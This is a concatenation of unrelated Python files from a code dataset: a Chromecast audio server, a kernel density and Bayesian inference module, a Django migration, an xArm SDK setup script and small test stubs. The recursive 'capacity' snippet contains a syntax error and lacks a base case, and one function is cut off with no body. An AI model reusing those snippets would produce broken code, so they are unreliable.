type=_text_type,
choices=["0", "1"],
help='[Darknet] Parse the darknet model weight file from the start.')
return parser
def _main():
parser = _get_parser()
args = parser.parse_args()
ret = _convert(args)
_sys.exit(int(ret)) # cast to int or else the exit code is always 1
if __name__ == '__main__':
_main()
| StarcoderdataPython |
3278103 | <gh_stars>0
import datetime
import http.server
import logging
import socket
import socketserver
import time
from multiprocessing import Process
from pathlib import Path
from caster import Caster
from speech_synthesizer import SpeechSynthesizer
from yahoo_train_info_scraper import YahooTrainInfoScraper
logger = logging.getLogger(__name__)
def serve(port):
logger.info(f"serving at port {port}")
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", port), Handler) as httpd:
httpd.serve_forever()
class Server:
def __init__(self):
pass
@classmethod
def ip_addr(cls) -> str:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
s.close()
return ip
def start(self, friendly_name: str, file_path: Path):
port = 8000
p = Process(target=serve, args=(port,), daemon=True)
p.start()
# send to chromecast (as a promise, audio file is hosted by another http.server process)
caster = Caster(friendly_name)
server_host = Server.ip_addr()
logger.info(f"serve at {server_host}:{port}")
caster.cast(f"http://{server_host}:{port}/{file_path}")
time.sleep(20)
| StarcoderdataPython |
1636755 | def capacity(K, w):
w.sort(reverse = True)
return _capacity(K, w)
def _capacity(K, w):
cut = 0
while w[cut] > K:
cut += 1
w = w[cut:]
sub = _capacity(K-w[0], w[1:])
if sub is None:
sub = _capacity(K, w{1:])
if sub is None:
return None
else:
return sub
else:
sub.append(w[0])
return sub
| StarcoderdataPython |
3225222 | # Generated by Django 2.0.5 on 2018-05-24 08:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('sim_v1', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='document',
name='description',
),
]
| StarcoderdataPython |
1728224 | <gh_stars>1-10
# Copyright (c) 2021. <NAME>, Ghent University
import math
import warnings
import numpy as np
import pandas as pd
from numpy.random import uniform
from scipy import ndimage, integrate
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KernelDensity
from sklearn.utils import check_array
from skbel.algorithms.extmath import get_block
__all__ = [
"KDE",
"kde_params",
"posterior_conditional",
"mvn_inference",
"it_sampling",
"normalize",
]
def tupleset(t, i, value):
"""Set the `i`th element of a tuple to `value`.
:param t: tuple
:param i: index
:param value: value
"""
l = list(t)
l[i] = value
return tuple(l)
def romb(y: np.array, dx: float = 1.0) -> np.array:
"""Romberg integration using samples of a function.
:param y: A vector of ``2**k + 1`` equally-spaced samples of a function.
:param dx: The sample spacing. Default is 1.
:return: The integral of the function.
"""
y = np.asarray(y)
nd = len(y.shape)
axis = -1
Nsamps = y.shape[axis]
Ninterv = Nsamps - 1
n = 1
k = 0
while n < Ninterv:
n <<= 1
k += 1
if n != Ninterv:
raise ValueError(
"Number of samples must be one plus a " "non-negative power of 2."
)
R = {}
slice_all = (slice(None),) * nd
slice0 = tupleset(slice_all, axis, 0)
slicem1 = tupleset(slice_all, axis, -1)
h = Ninterv * np.asarray(dx, dtype=float)
R[(0, 0)] = (y[slice0] + y[slicem1]) / 2.0 * h
slice_R = slice_all
start = stop = step = Ninterv
for i in range(1, k + 1):
start >>= 1
slice_R = tupleset(slice_R, axis, slice(start, stop, step))
step >>= 1
R[(i, 0)] = 0.5 * (R[(i - 1, 0)] + h * y[slice_R].sum(axis=axis))
for j in range(1, i + 1):
prev = R[(i, j - 1)]
R[(i, j)] = prev + (prev - R[(i - 1, j - 1)]) / ((1 << (2 * j)) - 1)
h /= 2.0
return R[(k, k)]
class KDE:
"""Bivariate kernel density estimator.
This class is adapted from the class of the same name in the package Seaborn 0.11.1
https://seaborn.pydata.org/generated/seaborn.kdeplot.html
"""
def __init__(
self,
*,
kernel_type: str = None,
bandwidth: float = None,
grid_search: bool = True,
bandwidth_space: np.array = None,
gridsize: int = 200,
cut: float = 1,
clip: list = None,
):
"""Initialize the estimator with its parameters.
:param kernel_type: kernel type, one of 'gaussian', 'tophat', 'epanechnikov',
'exponential', 'linear', 'cosine'
:param bandwidth: bandwidth
:param grid_search: perform a grid search for the bandwidth
:param bandwidth_space: array of bandwidths to try
:param gridsize: number of points on each dimension of the evaluation grid.
:param cut: Factor, multiplied by the smoothing bandwidth, that determines how
far the evaluation grid extends past the extreme datapoints. When
set to 0, truncate the curve at the data limits.
:param clip: A list of two elements, the lower and upper bounds for the
support of the density. If None, the support is the range of the data.
"""
if clip is None:
clip = None, None
self.kernel_type = kernel_type
if kernel_type is None:
self.kernel_type = "gaussian" # default
self.bw = bandwidth
self.grid_search = grid_search
if bandwidth_space is None:
self.bandwidth_space = np.logspace(-2, 1, 50) # default bandwidths
else:
self.bandwidth_space = bandwidth_space
self.gridsize = gridsize
self.cut = cut
self.clip = clip
self.support = None
@staticmethod
def _define_support_grid(
x: np.array, bandwidth: float, cut: float, clip: list, gridsize: int
):
"""Create the grid of evaluation points depending for vector x.
:param x: vector of values
:param bandwidth: bandwidth
:param cut: factor, multiplied by the smoothing bandwidth, that determines how
far the evaluation grid extends past the extreme datapoints. When
set to 0, truncate the curve at the data limits.
:param clip: pair of numbers None, or a pair of such pairs
Do not evaluate the density outside of these limits.
:param gridsize: number of points on each dimension of the evaluation grid.
:return: evaluation grid
"""
clip_lo = -np.inf if clip[0] is None else clip[0]
clip_hi = +np.inf if clip[1] is None else clip[1]
bw = 1 if bandwidth is None else bandwidth
gridmin = max(x.min() - bw * cut, clip_lo)
gridmax = min(x.max() + bw * cut, clip_hi)
return np.linspace(gridmin, gridmax, gridsize)
def _define_support_univariate(self, x: np.array):
"""Create a 1D grid of evaluation points.
:param x: 1D array of data
:return: 1D array of evaluation points
"""
grid = self._define_support_grid(
x, self.bw, self.cut, self.clip, self.gridsize
) # define grid
return grid
def _define_support_bivariate(self, x1: np.array, x2: np.array):
"""Create a 2D grid of evaluation points.
:param x1: 1st dimension of the evaluation grid
:param x2: 2nd dimension of the evaluation grid
:return: 2D grid of evaluation points
"""
clip = self.clip
if clip[0] is None or np.isscalar(clip[0]): # if clip is a single number
clip = (clip, clip)
grid1 = self._define_support_grid(
x1, self.bw, self.cut, clip[0], self.gridsize
) # define grid for x1
grid2 = self._define_support_grid(
x2, self.bw, self.cut, clip[1], self.gridsize
) # define grid for x2
return grid1, grid2
def define_support(
self,
x1: np.array,
x2: np.array = None,
cache: bool = True,
):
"""Create the evaluation grid for a given data set.
:param x1: 1D array of data
:param x2: 2D array of data
:param cache: if True, cache the support grid
:return: grid of evaluation points
"""
if x2 is None:
support = self._define_support_univariate(x1) # 1D
else:
support = self._define_support_bivariate(x1, x2) # 2D
if cache:
self.support = support # cache the support grid
return support
def _fit(self, fit_data: np.array):
"""Fit the scikit-learn KDE.
:param fit_data: Data to fit the KDE to
:return: fitted KDE object
"""
bw = 1 if self.bw is None else self.bw # bandwidth
fit_kws = {
"bandwidth": bw,
"algorithm": "auto", # kdtree or ball_tree
"kernel": self.kernel_type,
"metric": "euclidean", # default
"atol": 1e-4, # tolerance for convergence
"rtol": 0, #
"breadth_first": True, #
"leaf_size": 40,
"metric_params": None,
} # define the kernel density estimator parameters
kde = KernelDensity(**fit_kws) # initiate the estimator
if self.grid_search and not self.bw:
# GridSearchCV maximizes the total log probability density under the model.
# The data X will be be divided into train-test splits based on folds defined in cv param
# For each combination of parameters that you specified in param_grid, the model
# will be trained on the train part from the step above and then scoring will be used on test part.
# The scores for each parameter combination will be combined for all the folds and averaged.
# Highest performing parameter will be selected.
grid = GridSearchCV(
kde, {"bandwidth": self.bandwidth_space}
) # Grid search on bandwidth
grid.fit(fit_data) # Fit the grid search
self.bw = grid.best_params_[
"bandwidth"
] # Set the bandwidth to the best bandwidth
fit_kws["bandwidth"] = self.bw # Update the bandwidth in the fit_kws
kde.set_params(
**{"bandwidth": self.bw}
) # Update the bandwidth in the scikit-learn model
kde.fit(fit_data) # Fit the KDE
return kde
def _eval_univariate(self, x: np.array):
"""Fit and evaluate on univariate data.
:param x: Data to evaluate.
:return: (density, support)
"""
support = self.support
if support is None:
support = self.define_support(x, cache=True)
kde = self._fit(x.reshape(-1, 1))
density = np.exp(kde.score_samples(support.reshape(-1, 1))) # evaluate the KDE
return density, support
def _eval_bivariate(self, x1: np.array, x2: np.array):
"""Fit and evaluate on bivariate data.
:param x1: First data set.
:param x2: Second data set.
:return: (density, support)
"""
support = self.support
if support is None:
support = self.define_support(x1, x2, cache=False)
X_train = np.vstack([x1, x2]).T
kde = self._fit(X_train)
X, Y = np.meshgrid(*support)
grid = np.vstack([X.ravel(), Y.ravel()]).T
density = np.exp(kde.score_samples(grid)) # evaluate the KDE
density = density.reshape(X.shape)
return density, support
def __call__(self, x1, x2=None):
"""Fit and evaluate on univariate or bivariate data."""
if x2 is None:
return self._eval_univariate(x1)
else:
return self._eval_bivariate(x1, x2)
def _univariate_density(
data_variable: pd.DataFrame,
estimate_kws: dict,
):
"""Estimate the density of a single variable.
:param data_variable: DataFrame with a single variable.
:param estimate_kws: Keyword arguments for the density estimator.
:return: (density, support, bandwidth)
"""
# Initialize the estimator object
estimator = KDE(**estimate_kws)
sub_data = data_variable.dropna()
# # Extract the data points from this sub set and remove nulls
observations = sub_data["x"].to_numpy()
observation_variance = observations.var()
if math.isclose(observation_variance, 0) or np.isnan(observation_variance):
msg = "Dataset has 0 variance; skipping density estimate."
warnings.warn(msg, UserWarning)
# Estimate the density of observations at this level
density, support = estimator(observations)
return density, support, estimator.bw
def _bivariate_density(
data: pd.DataFrame,
estimate_kws: dict,
):
"""Estimate bivariate KDE.
:param data: DataFrame containing (x, y) data
:param estimate_kws: KDE parameters
:return: (density, support, bandwidth)
"""
estimator = KDE(**estimate_kws)
# Extract the data points from this sub set and remove nulls
sub_data = data.dropna()
observations = sub_data[["x", "y"]]
# Check that KDE will not error out
variance = observations[["x", "y"]].var()
if any(math.isclose(x, 0) for x in variance) or variance.isna().any():
msg = "Dataset has 0 variance; skipping density estimate."
warnings.warn(msg, UserWarning)
# Estimate the density of observations at this level
observations = observations["x"], observations["y"]
density, support = estimator(*observations)
return density, support, estimator.bw
def kde_params(
x: np.array = None,
y: np.array = None,
bw: float = None,
gridsize: int = 200,
cut: float = 1,
clip=None,
):
"""Computes the kernel density estimate (KDE) of one or two data sets.
:param x: The x-coordinates of the input data.
:param y: The y-coordinates of the input data.
:param gridsize: Number of discrete points in the evaluation grid.
:param bw: The bandwidth of the kernel.
:param cut: Draw the estimate to cut * bw from the extreme data points.
:param clip: Lower and upper bounds for datapoints used to fit KDE. Can provide
a pair of (low, high) bounds for bivariate plots.
:return: density: The estimated probability density function evaluated at the support.
support: The support of the density function, the x-axis of the KDE.
"""
# Pack the kwargs for KDE
estimate_kws = dict(
bandwidth=bw,
gridsize=gridsize,
cut=cut,
clip=clip,
)
if y is None:
data = {"x": x}
frame = pd.DataFrame(data=data)
density, support, bw = _univariate_density(
data_variable=frame, estimate_kws=estimate_kws
)
else:
data = {"x": x, "y": y}
frame = pd.DataFrame(data=data)
density, support, bw = _bivariate_density(
data=frame,
estimate_kws=estimate_kws,
)
return density, support, bw
def _pixel_coordinate(line: list, x_1d: np.array, y_1d: np.array, k: int = None):
"""Gets the pixel coordinate of the value x or y, in order to get posterior
conditional probability given a KDE.
:param line: Coordinates of the line we'd like to sample along [(x1, y1), (x2, y2)]
:param x_1d: List of x coordinates along the axis
:param y_1d: List of y coordinates along the axis
:param k: Used to set number of rows/columns
:return: (rows, columns)
"""
if k is None:
num = 200
else:
num = k
# https://stackoverflow.com/questions/18920614/plot-cross-section-through-heat-map
# Convert the line to pixel/index coordinates
x_world, y_world = np.array(list(zip(*line)))
col = y_1d.shape * (x_world - min(x_1d)) / x_1d.ptp()
row = x_1d.shape * (y_world - min(y_1d)) / y_1d.ptp()
# Interpolate the line at "num" points...
row, col = [np.linspace(item[0], item[1], num) for item in [row, col]]
return row, col
def _conditional_distribution(
kde_array: np.array,
x_array: np.array,
y_array: np.array,
x: float = None,
y: float = None,
k: int = None,
):
"""Compute the conditional posterior distribution p(x_array|y_array) given
x or y. Provide only one observation ! Either x or y. Perform a cross-
section in the KDE along the y axis.
:param kde_array: KDE of the prediction
:param x_array: X grid (1D)
:param y_array: Y grid (1D)
:param x: Observed data (horizontal axis)
:param y: Observed data (vertical axis)
:param k: Used to set number of rows/columns
:return: (cross_section: The cross-section of the KDE, line: The line of the KDE)
"""
# Coordinates of the line we'd like to sample along
if x is not None:
line = [(x, min(y_array)), (x, max(y_array))]
elif y is not None:
line = [(min(x_array), y), (max(x_array), y)]
else:
msg = "No observation point included."
warnings.warn(msg, UserWarning)
return 0
# Convert line to row/column
row, col = _pixel_coordinate(line=line, x_1d=x_array, y_1d=y_array, k=k)
# Extract the values along the line, using cubic interpolation
zi = ndimage.map_coordinates(kde_array, np.vstack((row, col)))
if x is not None:
line = np.linspace(min(y_array), max(y_array), k)
elif y is not None:
line = np.linspace(min(x_array), max(x_array), k)
return zi, line
def _scale_distribution(post: np.array, support: np.array) -> np.array:
"""Scale the distribution to have a maximum of 1, and a minimum of 0.
:param post: Values of the KDE cross-section
:param support: Support of the KDE cross-section
:return: The scaled distribution
"""
post[np.abs(post) < 1e-8] = 0 # Rule of thumb
if post.any(): # If there is any value
a = integrate.simps(y=np.abs(post), x=support) # Integrate the absolute values
post *= 1 / a # Scale the distribution
return post
def posterior_conditional(
X_obs: float = None,
Y_obs: float = None,
dens: np.array = None,
support: np.array = None,
k: int = None,
) -> (np.array, np.array):
"""Computes the posterior distribution p(y|x_obs) or p(x|y_obs) by doing a
cross section of the KDE of (d, h).
:param X_obs: Observation (predictor, x-axis)
:param Y_obs: Observation (target, y-axis)
:param dens: The density values of the KDE of (X, Y).
:param support: The support grid of the KDE of (X, Y).
:param k: Used to set number of rows/columns
:return: The posterior distribution p(y|x_obs) or p(x|y_obs) and the support grid of the cross-section.
"""
# Grid parameters
xg, yg = support
if X_obs is not None:
# Extract the density values along the line, using cubic interpolation
if isinstance(X_obs, list) or isinstance(X_obs, np.ndarray):
X_obs = X_obs[0]
post, line = _conditional_distribution(
x=X_obs, x_array=xg, y_array=yg, kde_array=dens, k=k
)
elif Y_obs is not None:
# Extract the density values along the line, using cubic interpolation
if isinstance(Y_obs, list) or isinstance(Y_obs, np.ndarray):
Y_obs = Y_obs[0]
post, line = _conditional_distribution(
y=Y_obs, x_array=xg, y_array=yg, kde_array=dens, k=k
)
else:
msg = "No observation point included."
warnings.warn(msg, UserWarning)
return 0
post = _scale_distribution(post, line)
return post, line
def mvn_inference(
X: np.array, Y: np.array, X_obs: np.array, **kwargs
) -> (np.array, np.array):
"""Estimates the posterior mean and covariance of the target.
Note that in this implementation, n_samples must be = 1.
.. [1] <NAME>. Inverse Problem Theory and Methods for Model Parameter Estimation.
SIAM, 2005. Pages: 70-71
:param X: Canonical Variate of the training data
:param Y: Canonical Variate of the training target, gaussian-distributed
:param X_obs: Canonical Variate of the observation (n_samples, n_features).
:return: y_posterior_mean, y_posterior_covariance
"""
Y = check_array(Y, copy=True, ensure_2d=False)
X = check_array(X, copy=True, ensure_2d=False)
X_obs = check_array(X_obs, copy=True, ensure_2d=False)
# Size of the set
n_training = X.shape[0]
# Computation of the posterior mean in Canonical space
y_mean = np.mean(Y, axis=0) # (n_comp_CCA, 1) # noqa
# Mean is 0, as expected.
y_mean = np.where(np.abs(y_mean) < 1e-8, 0, y_mean)
# Evaluate the covariance in h (in Canonical space)
# Very close to the Identity matrix
# (n_comp_CCA, n_comp_CCA)
y_cov = np.cov(Y.T) # noqa
if "x_cov" in kwargs.keys():
x_cov = kwargs["x_cov"]
else:
x_cov = np.zeros(shape=y_cov.shape)
# Linear modeling h to d (in canonical space) with least-square criterion.
# Pay attention to the transpose operator.
# Computes the vector g that approximately solves the equation y @ g = x.
g = np.linalg.lstsq(Y, X, rcond=None)[0].T
# Replace values below threshold by 0.
g = np.where(np.abs(g) < 1e-8, 0, g) # (n_comp_CCA, n_comp_CCA)
# Modeling error due to deviations from theory
# (n_components_CCA, n_training)
x_ls_predicted = np.matmul(Y, g.T) # noqa
x_modeling_mean_error = np.mean(X - x_ls_predicted, axis=0) # (n_comp_CCA, 1)
x_modeling_error = (
X - x_ls_predicted - np.tile(x_modeling_mean_error, (n_training, 1))
)
# (n_comp_CCA, n_training)
# Information about the covariance of the posterior distribution in Canonical space.
x_modeling_covariance = np.cov(x_modeling_error.T) # (n_comp_CCA, n_comp_CCA)
# Build block matrix
s11 = y_cov
if y_cov.ndim == 0:
y_cov = [y_cov]
s12 = y_cov @ g.T
s21 = g @ y_cov
s22 = g @ y_cov @ g.T + x_cov + x_modeling_covariance
block = np.block([[s11, s12], [s21, s22]])
# Inverse
delta = np.linalg.pinv(block)
# Partition block
d11 = get_block(delta, 1)
d12 = get_block(delta, 2)
# Observe that posterior covariance does not depend on observed x.
y_posterior_covariance = np.linalg.pinv(d11) # (n_comp_CCA, n_comp_CCA)
# Computing the posterior mean is simply a linear operation, given precomputed posterior covariance.
y_posterior_mean = y_posterior_covariance @ (
d11 @ y_mean - d12 @ (X_obs[0] - x_modeling_mean_error - y_mean @ g.T) # noqa
) # (n_comp_CCA,)
return y_posterior_mean, y_posterior_covariance
def normalize(pdf):
"""Normalize a non-normalized PDF.
:param pdf: The probability density function (not necessarily normalized). Must take
floats or ints as input, and return floats as an output.
:return: pdf_norm: Function with same signature as pdf, but normalized so that the integral
between lower_bd and upper_bd is close to 1. Maps nicely over iterables.
"""
dx = np.abs(pdf.x[1] - pdf.x[0]) # Assume uniform spacing
quadrature = romb(pdf.y, dx) # Integrate using Romberg's method
A = quadrature # Normalization constant
def pdf_normed(x):
"""Normalized PDF.
:param x: Input to the pdf.
:return: pdf(x) / A.
"""
b = np.interp(x=x, xp=pdf.x, fp=pdf.y) # Evaluate the PDF at x
if A < 1e-3: # Rule of thumb
return 0
if b / A < 1e-3: # If the PDF is very small, return 0
return 0
else:
return b / A
return pdf_normed
def get_cdf(pdf):
"""Generate a CDF from a (possibly not normalized) pdf.
:param pdf: The probability density function (not necessarily normalized). Must take
floats or ints as input, and return floats as an output.
:return: cdf: The cumulative density function of the (normalized version of the)
provided pdf. Will return a float if provided with a float or int; will
return a numpy array if provided with an iterable.
"""
pdf_norm = normalize(pdf) # Calculate the normalized pdf
lower_bound = np.min(pdf.x)
upper_bound = np.max(pdf.x)
def cdf_number(x):
"""Numerical cdf.
:param x: The value to evaluate the cdf at.
:return: The value of the cdf at x.
"""
if x <= lower_bound:
return 0
elif x >= upper_bound:
return 1
else:
d = np.abs(x - lower_bound)
if d > 1e-4: # Check that spacing isn't too small
samples = np.linspace(lower_bound, x, 2 ** 7 + 1)
dx = np.abs(samples[1] - samples[0])
y = np.array([pdf_norm(s) for s in samples])
return romb(y, dx)
else:
return 0
def cdf_vector(x):
"""Vectorized cdf.
:param x: The values to evaluate the cdf at.
:return: The values of the cdf at x.
"""
try:
return np.array([cdf_number(xi) for xi in x])
except AttributeError:
return cdf_number(x)
return cdf_vector
def it_sampling(
pdf,
num_samples: int = 1,
lower_bd=-np.inf,
upper_bd=np.inf,
k: int = None,
cdf_y: np.array = None,
return_cdf: bool = False,
):
"""Sample from an arbitrary, un-normalized PDF.
:param pdf: function, float -> float The probability density function (not necessarily normalized). Must take floats
or ints as input, and return floats as an output.
:param num_samples: The number of samples to be generated.
:param lower_bd: Lower bound of the support of the pdf. This parameter allows one to manually establish cutoffs for
the density.
:param upper_bd: Upper bound of the support of the pdf.
:param k: Step number between lower_bd and upper_bd
:param cdf_y: precomputed values of the CDF
:param return_cdf: Option to return the computed CDF values
:return: samples: An array of samples from the provided PDF, with support between lower_bd and upper_bd.
"""
if k is None:
k = 200 # Default step size
if cdf_y is None:
cdf = get_cdf(pdf) # CDF of the pdf
cdf_y = cdf(np.linspace(lower_bd, upper_bd, k)) # CDF values
if return_cdf:
return cdf_y
else:
if cdf_y.any():
seeds = uniform(0, 1, num_samples) # Uniformly distributed seeds
simple_samples = np.interp(x=seeds, xp=cdf_y, fp=pdf.x) # Samples
else:
simple_samples = np.zeros(num_samples) # Samples
return simple_samples
| StarcoderdataPython |
140806 | <reponame>krasin/xArm-Python-SDK-ssh
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, UFactory, Inc.
# All rights reserved.
#
# Author: Vinman <<EMAIL>>
import os
from distutils.util import convert_path
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup
def find_packages(base_path='.'):
base_path = convert_path(base_path)
found = []
for root, dirs, files in os.walk(base_path, followlinks=True):
dirs[:] = [d for d in dirs if d[0] != '.' and d not in ('ez_setup', '__pycache__')]
relpath = os.path.relpath(root, base_path)
parent = relpath.replace(os.sep, '.').lstrip('.')
if relpath != '.' and parent not in found:
# foo.bar package but no foo package, skip
continue
for dir in dirs:
if os.path.isfile(os.path.join(root, dir, '__init__.py')):
package = '.'.join((parent, dir)) if parent else dir
found.append(package)
return found
main_ns = {}
ver_path = convert_path('xarm/version.py')
with open(os.path.join(os.getcwd(), ver_path)) as ver_file:
exec(ver_file.read(), main_ns)
version = main_ns['__version__']
# long_description = open('README.rst').read()
long_description = 'long description for xArm-Python-SDK'
with open(os.path.join(os.getcwd(), 'requirements.txt')) as f:
requirements = f.read().splitlines()
setup(
name='xArm-Python-SDK',
version=version,
author='Vinman',
description='Python SDK for xArm',
packages=find_packages(),
author_email='<EMAIL>',
install_requires=requirements,
long_description=long_description,
license='MIT',
zip_safe=False
)
| StarcoderdataPython |
3203285 | def check_alive(health):
| StarcoderdataPython |
195050 | <reponame>rgerkin/brian2<filename>brian2/tests/features/__init__.py
from __future__ import absolute_import
__all__ = ['FeatureTest',
'SpeedTest',
'InaccuracyError',
'Configuration',
'run_feature_tests']
from .base import *
from . import neurongroup
from . import synapses
from . import monitors
from . import input
from . import speed
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.